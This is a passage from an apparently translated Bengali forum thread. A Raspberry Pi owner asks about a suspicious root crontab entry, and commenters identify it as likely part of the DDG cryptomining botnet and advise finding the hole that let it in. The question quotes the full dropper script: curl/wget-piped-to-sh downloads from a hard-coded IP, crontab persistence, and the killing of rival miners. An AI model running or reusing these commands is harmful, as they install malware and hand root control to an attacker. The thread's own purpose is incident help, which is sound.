আমি আমার রাস্পবেরি পাইতে আমার রুট ক্রন্টব ফাইলটিতে কিছু যুক্ত করতে চেয়েছিলাম এবং এমন একটি এন্ট্রি পেয়েছি যা আমার কাছে সন্দেহজনক বলে মনে হয়, গুগলে এর কিছু অংশ অনুসন্ধান করে কিছুই পাওয়া যায় নি।
ক্রন্টব এন্ট্রি:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
বিষয়বস্তু হ'ল http://103.219.112.66:8000/i.sh:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
আমার লিনাক্স জ্ঞান সীমিত তবে আমার কাছে মনে হয় ইন্দোনেশিয়ান সার্ভার থেকে বাইনারিগুলি ডাউনলোড করা এবং সেগুলি নিয়মিত রুট হিসাবে চালানো সাধারণ জিনিস নয়।
এটা কি? আমার কি করা উচিৎ?
16
এটি বিজ্ঞপ্তি। প্রতি 15 মিনিটে এটি ডাউনলোড করে এবং এটির একটি নতুন কপি ইনস্টল করে। যদি / যখন রিমোট সার্ভারে অনুলিপি পরিবর্তন করা হয়, এই ক্রোনজব চালিত সমস্ত সার্ভারগুলি 15 মিনিটের মধ্যে নতুন কোড যাই হোক না কেন কার্যকর করবে।
—
ওয়াইল্ডকার্ড
আপনার রাস্পবেরি পাই ইন্টারনেট খোলা আছে? আপনার রাস্পবেরি পাই কি চলছে? গুগলে এইমাত্র ফলাফল যখন আমি xribfa4 অনুসন্ধান করি। আপনি যদি এমন সফ্টওয়্যার না চালাচ্ছেন যা এটি করার প্রয়োজন হয় তবে এটি সম্ভবত একটি ভাইরাস।
—
কেমোটেপ
@ কেমোটেপ এই স্ট্রিংটি এলোমেলো, তবে আইপি-র জন্য গুগল এবং এটি কয়েকটি ফলাফল দেয়। ডিডিজি মাইনিং বোটনেট সম্পর্কে কিছু
—
frostschutz
আমি এটি খুঁজে পেয়েছি। এটি উন্মাদ যে আইপি ইন্দোনেশিয়ার সরকারী সাইটে নিবন্ধিত হয়েছে। দেখতে আরও প্রায় 2000 টি আইপিস রয়েছে যা এই পেলোডটি সরবরাহ করে।
—
কেমোটেপ
আপনার অবশ্যই সচেতন হওয়া উচিত প্রধান বিষয় হ'ল আপনি যদি সেই ক্রন্টব এন্ট্রি অপসারণ করেন তবে আপনার সিস্টেমে সম্ভবত এখনও দুর্বলতা রয়েছে যা এটি সংক্রামিত হতে দিয়েছে। আপনার সেই দুর্বলতাটি খুঁজে বের করতে হবে এবং এটি ঠিক করতে হবে।
—
হ্যান্স-মার্টিন মোসনার 21